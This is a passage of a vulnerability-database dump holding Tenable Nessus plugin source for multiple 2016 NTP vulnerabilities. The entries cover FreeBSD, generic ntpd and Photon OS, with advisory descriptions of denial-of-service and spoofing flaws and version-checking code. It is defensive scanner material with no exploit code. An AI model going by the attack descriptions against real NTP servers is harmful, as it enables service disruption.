Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(96123);\n script_version(\"3.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-7426\", \"CVE-2016-7427\", \"CVE-2016-7428\", \"CVE-2016-7431\", \"CVE-2016-7433\", \"CVE-2016-7434\", \"CVE-2016-9310\", \"CVE-2016-9311\");\n script_xref(name:\"FreeBSD\", value:\"SA-16:39.ntp\");\n\n script_name(english:\"FreeBSD : FreeBSD -- Multiple vulnerabilities of ntp (fcedcdbb-c86e-11e6-b1cf-14dae9d210b8)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple 
vulnerabilities have been discovered in the NTP suite :\n\nCVE-2016-9311: Trap crash, Reported by Matthew Van Gundy of Cisco\nASIG.\n\nCVE-2016-9310: Mode 6 unauthenticated trap information disclosure and\nDDoS vector. Reported by Matthew Van Gundy of Cisco ASIG.\n\nCVE-2016-7427: Broadcast Mode Replay Prevention DoS. Reported by\nMatthew Van Gundy of Cisco ASIG.\n\nCVE-2016-7428: Broadcast Mode Poll Interval Enforcement DoS. Reported\nby Matthew Van Gundy of Cisco ASIG.\n\nCVE-2016-7431: Regression: 010-origin: Zero Origin Timestamp Bypass.\nReported by Sharon Goldberg and Aanchal Malhotra of Boston University.\n\nCVE-2016-7434: NULL pointer dereference in\n_IO_str_init_static_internal(). Reported by Magnus Stubman.\n\nCVE-2016-7426: Client rate limiting and server responses. Reported by\nMiroslav Lichvar of Red Hat.\n\nCVE-2016-7433: Reboot sync calculation problem. Reported independently\nby Brian Utterback of Oracle, and by Sharon Goldberg and Aanchal\nMalhotra of Boston University. Impact : A remote attacker who can send\na specially crafted packet to cause a NULL pointer dereference that\nwill crash ntpd, resulting in a Denial of Service. [CVE-2016-9311]\n\nAn exploitable configuration modification vulnerability exists in the\ncontrol mode (mode 6) functionality of ntpd. If, against long-standing\nBCP recommendations, 'restrict default noquery ...' 
is not specified,\na specially crafted control mode packet can set ntpd traps, providing\ninformation disclosure and DDoS amplification, and unset ntpd traps,\ndisabling legitimate monitoring by an attacker from remote.\n[CVE-2016-9310]\n\nAn attacker with access to the NTP broadcast domain can periodically\ninject specially crafted broadcast mode NTP packets into the broadcast\ndomain which, while being logged by ntpd, can cause ntpd to reject\nbroadcast mode packets from legitimate NTP broadcast servers.\n[CVE-2016-7427]\n\nAn attacker with access to the NTP broadcast domain can send specially\ncrafted broadcast mode NTP packets to the broadcast domain which,\nwhile being logged by ntpd, will cause ntpd to reject broadcast mode\npackets from legitimate NTP broadcast servers. [CVE-2016-7428]\n\nOrigin timestamp problems were fixed in ntp 4.2.8p6. However,\nsubsequent timestamp validation checks introduced a regression in the\nhandling of some Zero origin timestamp checks. [CVE-2016-7431]\n\nIf ntpd is configured to allow mrulist query requests from a server\nthat sends a crafted malicious packet, ntpd will crash on receipt of\nthat crafted malicious mrulist query packet. [CVE-2016-7434]\n\nAn attacker who knows the sources (e.g., from an IPv4 refid in server\nresponse) and knows the system is (mis)configured in this way can\nperiodically send packets with spoofed source address to keep the rate\nlimiting activated and prevent ntpd from accepting valid responses\nfrom its sources. [CVE-2016-7426]\n\nNtp Bug 2085 described a condition where the root delay was included\ntwice, causing the jitter value to be higher than expected. Due to a\nmisinterpretation of a small-print variable in The Book, the fix for\nthis problem was incorrect, resulting in a root distance that did not\ninclude the peer dispersion. 
The calculations and formulas have been\nreviewed and reconciled, and the code has been updated accordingly.\n[CVE-2016-7433]\"\n );\n # https://vuxml.freebsd.org/freebsd/fcedcdbb-c86e-11e6-b1cf-14dae9d210b8.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?448b983e\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:FreeBSD\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/12/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/27\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"FreeBSD>=11.0<11.0_6\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"FreeBSD>=10.3<10.3_15\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"FreeBSD>=10.2<10.2_28\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"FreeBSD>=10.1<10.1_45\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"FreeBSD>=9.3<9.3_53\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-04-30T09:41:05", "description": "The version of the remote NTP server is 4.x prior to 4.2.8p9. It is,\ntherefore, affected by the following vulnerabilities :\n\n - A denial of service vulnerability exists when rate\n limiting is configured for all associations, the limits\n also being applied to responses received from the\n configured sources. An unauthenticated, remote attacker\n can exploit this, by periodically sending spoofed\n packets, to keep rate limiting active, resulting in\n valid responses not being accepted by ntpd from its\n sources. (CVE-2016-7426)\n\n - A denial of service vulnerability exists in the\n broadcast mode replay prevention functionality. 
An\n unauthenticated, adjacent attacker can exploit this, via\n specially crafted broadcast mode NTP packets\n periodically injected into the broadcast domain, to\n cause ntpd to reject broadcast mode packets from\n legitimate NTP broadcast servers. (CVE-2016-7427)\n\n - A denial of service vulnerability exists in the\n broadcast mode poll interval functionality. An\n unauthenticated, adjacent attacker can exploit this, via\n specially crafted broadcast mode NTP packets, to cause\n ntpd to reject packets from a legitimate NTP broadcast\n server. (CVE-2016-7428)\n\n - A denial of service vulnerability exists when receiving\n server responses on sockets that correspond to different\n interfaces than what were used in the request. An\n unauthenticated, remote attacker can exploit this, by\n sending repeated requests using specially crafted\n packets with spoofed source addresses, to cause ntpd\n to select the incorrect interface for the source, which\n prevents it from sending new requests until the\n interface list is refreshed. This eventually results in\n preventing ntpd from synchronizing with the source.\n (CVE-2016-7429)\n\n - A flaw exists that allows packets with an origin\n timestamp of zero to bypass security checks. An\n unauthenticated, remote attacker can exploit this to\n spoof arbitrary content. (CVE-2016-7431)\n\n - A flaw exists due to the root delay being included\n twice, which may result in the jitter value being higher\n than expected. An unauthenticated, remote attacker can\n exploit this to cause a denial of service condition.\n (CVE-2016-7433)\n\n - A denial of service vulnerability exists when handling\n specially crafted mrulist query packets that allows an\n unauthenticated, remote attacker to crash ntpd.\n (CVE-2016-7434)\n\n - A flaw exists in the control mode (mode 6) functionality\n when handling specially crafted control mode packets. 
An\n unauthenticated, adjacent attacker can exploit this to\n set or disable ntpd traps, resulting in the disclosure\n of potentially sensitive information, disabling of\n legitimate monitoring, or DDoS amplification.\n (CVE-2016-9310)\n\n - A NULL pointer dereference flaw exists in the\n report_event() function within file ntpd/ntp_control.c\n when the trap service handles certain peer events. An\n unauthenticated, remote attacker can exploit this, via\n a specially crafted packet, to cause a denial of service\n condition. (CVE-2016-9311)\n\n - A denial of service vulnerability exists when handling\n oversize UDP packets that allows an unauthenticated,\n remote attacker to crash ntpd. Note that this\n vulnerability only affects Windows versions.\n (CVE-2016-9312)", "edition": 25, "cvss3": {"score": 3.7, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"}, "published": "2016-12-06T00:00:00", "title": "Network Time Protocol Daemon (ntpd) 4.x < 4.2.8p9 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9312", "CVE-2016-7434", "CVE-2016-9311", "CVE-2016-7433", "CVE-2016-7427", "CVE-2016-7429", "CVE-2016-7428", "CVE-2016-9310", "CVE-2016-7426", "CVE-2016-7431"], "modified": "2016-12-06T00:00:00", "cpe": ["cpe:/a:ntp:ntp"], "id": "NTP_4_2_8P9.NASL", "href": "https://www.tenable.com/plugins/nessus/95575", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(95575);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/04/27\");\n\n script_cve_id(\n \"CVE-2016-7426\",\n \"CVE-2016-7427\",\n \"CVE-2016-7428\",\n \"CVE-2016-7429\",\n \"CVE-2016-7431\",\n \"CVE-2016-7433\",\n \"CVE-2016-7434\",\n \"CVE-2016-9310\",\n \"CVE-2016-9311\",\n \"CVE-2016-9312\"\n );\n script_bugtraq_id(\n 94444,\n 94446,\n 94447,\n 94448,\n 94450,\n 94451,\n 94452,\n 94453,\n 94454,\n 94455\n );\n script_xref(name:\"CERT\", 
value:\"633847\");\n\n script_name(english:\"Network Time Protocol Daemon (ntpd) 4.x < 4.2.8p9 Multiple Vulnerabilities\");\n script_summary(english:\"Checks for a vulnerable NTP server.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote NTP server is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of the remote NTP server is 4.x prior to 4.2.8p9. It is,\ntherefore, affected by the following vulnerabilities :\n\n - A denial of service vulnerability exists when rate\n limiting is configured for all associations, the limits\n also being applied to responses received from the\n configured sources. An unauthenticated, remote attacker\n can exploit this, by periodically sending spoofed\n packets, to keep rate limiting active, resulting in\n valid responses not being accepted by ntpd from its\n sources. (CVE-2016-7426)\n\n - A denial of service vulnerability exists in the\n broadcast mode replay prevention functionality. An\n unauthenticated, adjacent attacker can exploit this, via\n specially crafted broadcast mode NTP packets\n periodically injected into the broadcast domain, to\n cause ntpd to reject broadcast mode packets from\n legitimate NTP broadcast servers. (CVE-2016-7427)\n\n - A denial of service vulnerability exists in the\n broadcast mode poll interval functionality. An\n unauthenticated, adjacent attacker can exploit this, via\n specially crafted broadcast mode NTP packets, to cause\n ntpd to reject packets from a legitimate NTP broadcast\n server. (CVE-2016-7428)\n\n - A denial of service vulnerability exists when receiving\n server responses on sockets that correspond to different\n interfaces than what were used in the request. 
An\n unauthenticated, remote attacker can exploit this, by\n sending repeated requests using specially crafted\n packets with spoofed source addresses, to cause ntpd\n to select the incorrect interface for the source, which\n prevents it from sending new requests until the\n interface list is refreshed. This eventually results in\n preventing ntpd from synchronizing with the source.\n (CVE-2016-7429)\n\n - A flaw exists that allows packets with an origin\n timestamp of zero to bypass security checks. An\n unauthenticated, remote attacker can exploit this to\n spoof arbitrary content. (CVE-2016-7431)\n\n - A flaw exists due to the root delay being included\n twice, which may result in the jitter value being higher\n than expected. An unauthenticated, remote attacker can\n exploit this to cause a denial of service condition.\n (CVE-2016-7433)\n\n - A denial of service vulnerability exists when handling\n specially crafted mrulist query packets that allows an\n unauthenticated, remote attacker to crash ntpd.\n (CVE-2016-7434)\n\n - A flaw exists in the control mode (mode 6) functionality\n when handling specially crafted control mode packets. An\n unauthenticated, adjacent attacker can exploit this to\n set or disable ntpd traps, resulting in the disclosure\n of potentially sensitive information, disabling of\n legitimate monitoring, or DDoS amplification.\n (CVE-2016-9310)\n\n - A NULL pointer dereference flaw exists in the\n report_event() function within file ntpd/ntp_control.c\n when the trap service handles certain peer events. An\n unauthenticated, remote attacker can exploit this, via\n a specially crafted packet, to cause a denial of service\n condition. (CVE-2016-9311)\n\n - A denial of service vulnerability exists when handling\n oversize UDP packets that allows an unauthenticated,\n remote attacker to crash ntpd. 
Note that this\n vulnerability only affects Windows versions.\n (CVE-2016-9312)\");\n # http://support.ntp.org/bin/view/Main/SecurityNotice#November_2016_ntp_4_2_8p9_NTP_Se\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?08645c8c\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.ntp.org/bin/view/Main/NtpBug3067\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.ntp.org/bin/view/Main/NtpBug3071\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.ntp.org/bin/view/Main/NtpBug3072\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.ntp.org/bin/view/Main/NtpBug3082\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.ntp.org/bin/view/Main/NtpBug3102\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.ntp.org/bin/view/Main/NtpBug3110\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.ntp.org/bin/view/Main/NtpBug3113\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.ntp.org/bin/view/Main/NtpBug3114\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.ntp.org/bin/view/Main/NtpBug3118\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.ntp.org/bin/view/Main/NtpBug3119\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to NTP version 4.2.8p9 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-9311\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n 
script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/11/21\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/11/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/06\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:ntp:ntp\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ntp_open.nasl\");\n script_require_keys(\"NTP/Running\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\n# Make sure NTP server is running\nget_kb_item_or_exit('NTP/Running');\n\napp_name = \"NTP Server\";\n\nport = get_kb_item(\"Services/udp/ntp\");\nif (empty_or_null(port)) port = 123;\n\nversion = get_kb_item_or_exit(\"Services/ntp/version\");\nif (version == 'unknown') audit(AUDIT_UNKNOWN_APP_VER, app_name);\n\nmatch = eregmatch(string:version, pattern:\"([0-9a-z.]+)\");\nif (isnull(match) || empty_or_null(match[1])) audit(AUDIT_UNKNOWN_APP_VER, app_name);\n\n# Paranoia check\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nver = match[1];\nverfields = split(ver, sep:\".\", keep:FALSE);\nmajor = int(verfields[0]);\nminor = int(verfields[1]);\nif ('p' >< verfields[2])\n{\n revpatch = split(verfields[2], sep:\"p\", keep:FALSE);\n rev = int(revpatch[0]);\n patch = int(revpatch[1]);\n}\nelse\n{\n rev = verfields[2];\n patch = 0;\n}\n\n# This vulnerability affects NTP 4.x < 4.2.8p9\n# Check for vuln, else audit out.\nif (\n (major == 4 && minor < 2) ||\n (major == 4 && minor == 2 && rev < 8) ||\n (major == 4 && minor == 2 && rev == 8 && patch < 9)\n)\n{\n fix = 
\"4.2.8p9\";\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, app_name, version);\n\nreport =\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n\nsecurity_report_v4(\n port : port,\n proto : \"udp\",\n extra : report,\n severity : SECURITY_HOLE\n);\nexit(0);\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-01T01:06:55", "description": "An update of the ntpstat package has been released.", "edition": 17, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-02-07T00:00:00", "title": "Photon OS 1.0: Ntpstat PHSA-2017-0003", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-7434", "CVE-2016-8606", "CVE-2016-9311", "CVE-2016-7433", "CVE-2016-7427", "CVE-2016-7429", "CVE-2016-7428", "CVE-2016-9310", "CVE-2016-7426", "CVE-2016-7431"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:ntpstat", "cpe:/o:vmware:photonos:1.0"], "id": "PHOTONOS_PHSA-2017-0003_NTPSTAT.NASL", "href": "https://www.tenable.com/plugins/nessus/121669", "sourceData": "#\n# (C) Tenable Network Security, Inc.`\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2017-0003. 
The text\n# itself is copyright (C) VMware, Inc.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(121669);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2019/04/02 21:54:17\");\n\n script_cve_id(\n \"CVE-2016-7426\",\n \"CVE-2016-7427\",\n \"CVE-2016-7428\",\n \"CVE-2016-7429\",\n \"CVE-2016-7431\",\n \"CVE-2016-7433\",\n \"CVE-2016-7434\",\n \"CVE-2016-9310\",\n \"CVE-2016-9311\"\n );\n\n script_name(english:\"Photon OS 1.0: Ntpstat PHSA-2017-0003\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the ntpstat package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-19.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-8606\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:ntpstat\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:vmware:photonos:1.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 1.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"ntpstat-4.2.8p9-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"ntpstat-4.2.8p9-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"ntpstat-4.2.8p9-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"ntpstat-4.2.8p9-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"ntpstat-4.2.8p9-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"ntpstat-4.2.8p9-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"ntpstat-4.2.8p9-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"ntpstat-4.2.8p9-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"ntpstat-4.2.8p9-1.ph1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n 
port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ntpstat\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T01:06:55", "description": "An update of the ntp package has been released.", "edition": 17, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-02-07T00:00:00", "title": "Photon OS 1.0: Ntp PHSA-2017-0003", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-7434", "CVE-2016-8606", "CVE-2016-9311", "CVE-2016-7433", "CVE-2016-7427", "CVE-2016-7429", "CVE-2016-7428", "CVE-2016-9310", "CVE-2016-7426", "CVE-2016-7431"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:ntp", "cpe:/o:vmware:photonos:1.0"], "id": "PHOTONOS_PHSA-2017-0003_NTP.NASL", "href": "https://www.tenable.com/plugins/nessus/121668", "sourceData": "#\n# (C) Tenable Network Security, Inc.`\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2017-0003. 
The text\n# itself is copyright (C) VMware, Inc.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(121668);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2019/04/02 21:54:17\");\n\n script_cve_id(\n \"CVE-2016-7426\",\n \"CVE-2016-7427\",\n \"CVE-2016-7428\",\n \"CVE-2016-7429\",\n \"CVE-2016-7431\",\n \"CVE-2016-7433\",\n \"CVE-2016-7434\",\n \"CVE-2016-9310\",\n \"CVE-2016-9311\"\n );\n\n script_name(english:\"Photon OS 1.0: Ntp PHSA-2017-0003\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the ntp package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-19.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-8606\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:ntp\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:vmware:photonos:1.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 1.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"ntp-4.2.8p9-1.ph1\")) flag++;\nif 